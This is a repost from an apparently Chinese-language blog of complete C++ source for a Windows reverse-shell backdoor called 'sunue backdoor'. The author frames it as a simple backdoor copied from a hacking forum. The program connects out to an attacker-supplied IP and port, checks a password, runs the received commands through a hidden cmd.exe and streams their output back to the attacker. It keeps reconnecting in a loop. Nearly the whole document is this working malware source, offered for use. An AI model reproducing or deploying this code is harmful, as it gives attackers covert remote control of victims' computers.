VC++6 編譯通過,,,,,,,,
// reverse.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include <WINSOCK.H>
#include <stdio.h>
#pragma comment (lib,"ws2_32.lib")
#define PASSSUCCESS "Password success!/n"
#define PASSERROR "Password error./n"
#define BYEBYE "ByeBye!/n"
#define WSAerron WSAGetLastError()
#define erron GetLastError()
VOID WINAPI EXEBackMain (LPVOID s);
//BOOL EXEBackMain (SOCKET sock);
int main (int argc, TCHAR *argv[])
{
SOCKET sock=NULL;
struct sockaddr_in sai;
TCHAR UserPass[20]={0}; //用戶設置密碼緩衝
TCHAR PassBuf[20]={0}; //接收密碼緩衝
TCHAR PassBanner[]="/nPassword:";
TCHAR Banner[]="---------sunue backdoor---------/n";
if (argc!=4)
{
fprintf(stderr,"Code by sunue/n"
"Usage:%s [DestIP] [Port] [Password]/n",argv[0]);
return 0;
}
sai.sin_family=AF_INET;
//判斷參數合法性,並填充地址結構
//IP地址不能大於15
if (strlen(argv[1])<=15)
sai.sin_addr.s_addr=inet_addr(argv[1]);
else
{
goto Clean;
}
//端口不能小於0 && 大於65535
if (atoi(argv[2])>0&&atoi(argv[2])<65535)
sai.sin_port=htons(atoi(argv[2]));
else
{
goto Clean;
}
//密碼最大16位
if (strlen(argv[3])<=16)
strcpy(UserPass,argv[3]); //複製密碼
else
{
goto Clean;
}
while (TRUE)
{
WSADATA wsadata;
BOOL ThreadFlag=FALSE;
DWORD ThreadID=0;
int nRet=0;
nRet=WSAStartup(MAKEWORD(2,2),&wsadata); //初始化
if (nRet)
{
return 0;
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (sock==INVALID_SOCKET)
{
goto Clean;
}
nRet=connect(sock,(struct sockaddr*)&sai,sizeof (struct sockaddr));
if (nRet!=SOCKET_ERROR)
{
nRet=send(sock,Banner,sizeof (Banner),0);
if (nRet==SOCKET_ERROR)
{
goto Clean;
}
while (TRUE)
{
nRet=send(sock,PassBanner,sizeof (PassBanner),0);
if (nRet==SOCKET_ERROR)
{
goto Clean;
}
nRet=recv(sock,PassBuf,sizeof (PassBuf)-1,0);
if (strnicmp(PassBuf,UserPass,strlen(UserPass))==0)
{
ThreadFlag=TRUE;
break;
}
else
{
continue;
}
if (nRet==SOCKET_ERROR)
{
goto Clean;
}
Sleep(100);
}
if (ThreadFlag)
{
//EXEBackMain(sock);
CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)EXEBackMain,
(LPVOID)sock,0,&ThreadID);
}
}
Sleep(1000);
}
Clean:
if (sock!=NULL)
closesocket(sock);
WSACleanup();
return 0;
}
VOID WINAPI EXEBackMain (LPVOID s)
//BOOL EXEBackMain (SOCKET sock)
{
SOCKET sock=(SOCKET)s;
STARTUPINFO si;
PROCESS_INFORMATION pi;
HANDLE hRead=NULL,hWrite=NULL;
TCHAR CmdSign[]="/nsunue://>";
while (TRUE)
{
TCHAR MsgError[50]={0}; //錯誤消息緩衝
TCHAR Cmdline[300]={0}; //命令行緩衝
TCHAR RecvBuf[1024]={0}; //接收緩衝
TCHAR SendBuf[2048]={0}; //發送緩衝
SECURITY_ATTRIBUTES sa;
DWORD bytesRead=0;
int ret=0;
sa.nLength=sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor=NULL;
sa.bInheritHandle=TRUE;
//創建匿名管道
if (!CreatePipe(&hRead,&hWrite,&sa,0))
{
goto Clean;
}
si.cb=sizeof(STARTUPINFO);
GetStartupInfo(&si);
si.hStdError=hWrite;
si.hStdOutput=hWrite; //進程(cmd)的輸出寫入管道
si.wShowWindow=SW_HIDE;
si.dwFlags=STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
GetSystemDirectory(Cmdline,sizeof (Cmdline)); //獲取系統目錄
strcat(Cmdline,"//cmd.exe /c "); //拼接cmd
ret=send(sock,CmdSign,sizeof (CmdSign),0); //向目標發送提示符
if (ret==SOCKET_ERROR)
{
goto Clean;
}
ret=recv(sock,RecvBuf,sizeof (RecvBuf),0); //接收目標數據
//如果爲exit或quit,就退出
if (strnicmp(RecvBuf,"exit",4)==0||strnicmp(RecvBuf,"quit",4)==0)
{
goto Clean;
}
//表示對方已經斷開
if (ret==SOCKET_ERROR)
{
goto Clean;
}
//表示接收數據出錯
if (ret<=0)
{
continue;
}
Sleep(100); //休息一下,可要可不要
strncat(Cmdline,RecvBuf,sizeof (RecvBuf)); //拼接一條完整的cmd命令
//創建進程,也就是執行cmd命令
if (!CreateProcess(NULL,Cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi))
{
continue;
}
CloseHandle(hWrite);
while (TRUE)
{
//無限循環讀取管道中的數據,直到管道中沒有數據爲止
if (ReadFile(hRead,SendBuf,sizeof (SendBuf),&bytesRead,NULL)==0)
break;
send(sock,SendBuf,bytesRead,0); //發送出去
memset(SendBuf,0,sizeof (SendBuf)); //緩衝清零
Sleep(100); //休息一下
}
}
Clean:
//釋放句柄
if (hRead!=NULL)
CloseHandle(hRead);
if (hWrite!=NULL)
CloseHandle(hWrite);
//釋放SOCKET
if (sock!=NULL)
closesocket(sock);
WSACleanup();
ExitThread(0);
//return 0;
}
來段後門,反彈的,高手略過哈(轉自http://forum.darkst.com/read.php?tid=9537)
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.